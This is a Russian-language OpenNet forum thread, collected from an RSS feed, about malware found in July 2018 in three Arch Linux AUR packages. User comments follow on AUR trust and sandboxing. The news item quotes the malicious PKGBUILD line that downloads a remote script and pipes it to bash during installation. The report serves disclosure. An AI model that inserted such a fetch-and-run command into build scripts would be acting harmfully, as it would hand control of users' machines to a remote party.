OpenForum RSS: В AUR-репозитории Arch Linux найдено вредоносное ПО https://www.opennet.me/openforum/vsluhforumID3/114809.html В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах <br>acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.<br><br><br><br>7 июля в пакеты были внесены изменения, в результате которых<br>в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc) код "curl -s https://ptpb.pw/~x&#124;bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https:// В AUR-репозитории Arch Linux найдено вредоносное ПО (lucentcode) https://www.opennet.me/openforum/vsluhforumID3/114809.html#142 Sun, 29 Jul 2018 20:49:35 GMT &gt; просто не метод всё глазами и руками делать, так можно дойти до <br>&gt; самостоятельного написания нужных лично программ <br>&gt; тут скорее нужны наработки "защищённых андройдов" с песочницами, подстановкой виртуальных <br>&gt; данных вместо реальных и тд <br><br>Согласен, только пока ничего подобного не видел. И не факт что кто-то вообще возьмётся подобное пилить. Больше надежды что кто-то допилит песочницу для flatpack, и отсутствующее в репах ПО будут ставить из хаба с пакетами flatpack.<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (arisu) https://www.opennet.me/openforum/vsluhforumID3/114809.html#141 Mon, 16 Jul 2018 17:03:46 GMT вот тебе, например, рабочих мозгов надо.<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (Celcion) https://www.opennet.me/openforum/vsluhforumID3/114809.html#140 Mon, 16 Jul 2018 07:24:59 GMT &gt; ...и к нему контрольная сумма прилагается.<br>&gt; ...если контрольная сумма не совпадает (программа подменена или обновлена) &#8212; сборка и установка пакета не происходит.<br><br>Верно. Но кто сможет поручиться за то, что в бинарном пакете, лежащем на этом самом внешнем сайте, даже если он проходит валидацию - не запихали в одном из релизов вошек? Какой-то неизвестный Вася, собиравший PGKBUILD, тебе за это поручится?<br>Понятно, что это не будет проблемой AUR-а как таковой, но сам по себе AUR никто и не обвинял. Вопрос в том, что установка бинарных пакетов - есть. Со всеми из этого вытекающими потенциальными проблемами. Какой смысл с этим спорить, дескать, "а бинари не на самом AUR-е лежат!" - я фиг знает.<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (Celcion) https://www.opennet.me/openforum/vsluhforumID3/114809.html#139 Mon, 16 Jul 2018 07:16:29 GMT &gt; Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты.<br><br>Остаться правым можно в случае, если был какой-то спор. А когда ты говоришь про Фому, а тебе упорно в ответ талдычат про Ерёму - это не спор, а просто тупoсть. Но многих здесь это, видимо, устраивает.<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (FSA) https://www.opennet.me/openforum/vsluhforumID3/114809.html#138 Sun, 15 Jul 2018 10:22:45 GMT Вот реально в фоне бывает крутится сборка какого-то крупного обновления. Из неудобств, повышенный нагрев ноутбука небольшой и немного подёргивается Youtube иногда. При этом IDE работает нормально, gulp работает нормально, веб-сервер с PHP и MySQL работает приемлемо. Можно даже под Android проект собирать. А вот когда Windows начинает что-то ставить, хоть вешайся. Такое чувство, что она обновления из исходников собирает. При этом проблемы бывают даже с перемещением курсора. А самое главное, можно запускать сборку обновлений в тот момент, когда тебе особо компьютер не нужен, а вот Windows может это сделать тогда, когда вздумает нужным или вообще поставит перед фактом, мол давай-ка перезагрузимся, после чего пол часа висит на установке обновлений и вообще ничего делать не даёт. Особенно радует, когда играешь в танки и тут срочно что-то надо сделать. Закрываешь танки и пытаешься загрузить Linux. Но нет, Windows нужно установить обновления. Я однажды не выдержал и перезагрузился жёстко. Поработал, а обратно в Wind В AUR-репозитории Arch Linux найдено вредоносное ПО (чебурнет.рф) https://www.opennet.me/openforum/vsluhforumID3/114809.html#137 Sun, 15 Jul 2018 02:27:17 GMT Ты должен остаться правым в интернете. Что-бы не случилось, но ты должен остаться правым. В конце-концов, останется только один правый в интернете и это конечно же будешь ты. <br> В AUR-репозитории Arch Linux найдено вредоносное ПО (Аноним) https://www.opennet.me/openforum/vsluhforumID3/114809.html#136 Sat, 14 Jul 2018 17:52:56 GMT Все завидуют,ага.<br>Особенно bsdишники и гентушники ХD<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (Аноним) https://www.opennet.me/openforum/vsluhforumID3/114809.html#135 Sat, 14 Jul 2018 17:50:03 GMT &gt;В AUR-репозитории Arch Linux найдено вредоносное ПО <br><br>А сколько ещё не выявлено.) <br>Зато модно стильно и молодёжно.<br> В AUR-репозитории Arch Linux найдено вредоносное ПО (Джон Ленин) https://www.opennet.me/openforum/vsluhforumID3/114809.html#134 Fri, 13 Jul 2018 22:33:10 GMT Если ты хочешь из аура mesa-git собрать, то сначала надо подключить неофициальную репу llvm-svn<br><br>Там такая логика, что без одного ты не соберёшь другое, а собирать всё из сорцов &#8212; жизни не хватит чтоб разобраться с еггогами.<br>